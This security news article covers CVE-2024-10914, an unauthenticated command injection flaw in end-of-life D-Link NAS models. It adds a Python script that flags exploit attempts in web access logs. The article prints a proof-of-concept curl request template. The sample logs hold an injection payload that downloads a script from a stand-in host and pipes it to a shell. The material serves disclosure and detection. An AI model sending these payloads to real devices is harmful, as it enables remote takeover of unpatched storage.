A critical vulnerability has been discovered in older D-Link NAS devices, putting over 60,000 units at risk.

398/67 Monday, November 11, 2024

D-Link has issued a warning regarding over 60,000 end-of-life (EoL) network-attached storage (NAS) devices that are being targeted through a vulnerability that could allow malicious actors to take control of them. The flaw, tracked as CVE-2024-10914, has been given a critical severity score of 9.2. It stems from insufficient validation of the “name” parameter of the ‘cgi_user_add’ command in the account_mgr.cgi script, which lets unauthenticated attackers inject and execute arbitrary shell commands through crafted HTTP GET requests. The vulnerability impacts several D-Link NAS models popular with small businesses, including:

  • DNS-320 Version 1.00
  • DNS-320LW Version 1.01.0914.2012
  • DNS-325 Version 1.01, Version 1.02
  • DNS-340L Version 1.08

Researchers from Netsecfish have published technical details on this vulnerability, explaining that the attack uses an HTTP GET request to the target NAS with a shell command embedded in the query string. An example of such a request is:
curl "http://[Target-IP]/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27"
This curl command calls the cgi_user_add command with a maliciously crafted “name” parameter. The %27 sequences are URL-encoded single quotes: the first closes the quoted string the CGI script builds around the user name, the semicolons terminate that shell command and start a new one, and the trailing quote keeps the rest of the command line syntactically valid, so the injected command runs on the device with the privileges of the web server process.
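Because the injection travels in a plain GET request, it is easy to spot in web server or reverse-proxy access logs. The following is an added example (not code from the original article, from D-Link or from Netsecfish) that parses combined-format access log lines, URL-decodes the query string, and flags any request to /cgi-bin/account_mgr.cgi whose cmd is cgi_user_add and whose name parameter contains shell metacharacters. The log lines, IP addresses and file names are constructed for the demonstration and are not real traffic.

```python
"""Flag CVE-2024-10914-style command injection attempts in access logs.

Added example: the log lines below are constructed, not captured from a
real D-Link device, and the detection heuristic is the author's own.
"""
import re
from urllib.parse import unquote, unquote_plus

# Constructed sample log lines in Apache/nginx combined format.
SAMPLE_LOG = """\
203.0.113.10 - - [11/Nov/2024:10:01:02 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27 HTTP/1.1" 200 512 "-" "curl/8.4.0"
192.0.2.5 - - [11/Nov/2024:10:01:05 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=alice&pw=x HTTP/1.1" 200 220 "-" "Mozilla/5.0"
198.51.100.7 - - [11/Nov/2024:10:02:11 +0000] "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27%3Bwget%20http%3A%2F%2F198.51.100.7%2Fx.sh%7Csh%3B%27 HTTP/1.1" 200 512 "-" "python-requests/2.31"
203.0.113.10 - - [11/Nov/2024:10:03:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Combined log format: client IP, ident, user, [timestamp], "METHOD target PROTO", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Characters that let a value escape the quoted string in a shell command line.
# None of them belong in a legitimate NAS account name.
META_RE = re.compile(r"[;'\"`|&$<>(){}\n]")

VULN_PATH = "/cgi-bin/account_mgr.cgi"
VULN_CMD = "cgi_user_add"


def parse_query(query: str) -> dict:
    """Split a raw query string on '&' only and URL-decode keys and values.

    Done by hand rather than with urllib.parse.parse_qs so that ';' inside a
    value is never treated as a separator (older Python versions did that),
    which would hide exactly the character the attacker relies on.
    """
    params: dict = {}
    for pair in query.split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params.setdefault(unquote_plus(key), []).append(unquote_plus(value))
    return params


def is_injection_attempt(target: str) -> bool:
    """Return True if the request target matches the CVE-2024-10914 pattern."""
    path, _, query = target.partition("?")
    if path != VULN_PATH:
        return False
    params = parse_query(query)
    if VULN_CMD not in params.get("cmd", []):
        return False
    for name in params.get("name", []):
        # Decode a second time so a double-encoded payload (%2527 -> %27 -> ')
        # is still inspected after the CGI's own decoding step.
        if META_RE.search(unquote(name)):
            return True
    return False


def scan_log(text: str) -> list:
    """Return (client_ip, decoded_target) for every line that looks like an attempt."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m is None:
            continue
        if is_injection_attempt(m["target"]):
            hits.append((m["ip"], unquote(m["target"])))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"{ip} -> {target}")
```

Run against the sample, the script reports the two requests whose name parameter carries quotes and semicolons and ignores the benign account creation and the page fetch. Against real logs, treat any hit as a confirmed compromise attempt rather than a probe: the device executes the injected command whether or not the account is created, so the next step is to pull the NAS off the network and inspect it.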

Netsecfish’s search on the FOFA platform revealed 61,147 vulnerable D-Link devices exposed on 41,097 unique IP addresses. D-Link has since confirmed that there will be no security update for CVE-2024-10914, as the affected devices have reached the end of their support lifecycle. D-Link advises users to retire the affected products. If immediate retirement is not possible, users are urged to disconnect the devices from the public internet and restrict access to them to trusted networks only.

Additionally, researchers discovered another vulnerability earlier in 2024, CVE-2024-3273, involving unauthorized command injection together with an embedded backdoor account, which impacts most D-Link NAS models in a similar way to CVE-2024-10914. At that time, FOFA identified 92,589 affected devices. D-Link has confirmed that it has ceased production of NAS devices and, because of their EoL status, will provide no further security updates.

Source https://www.bleepingcomputer.com/news/security/d-link-wont-fix-critical-flaw-affecting-60-000-older-nas-devices/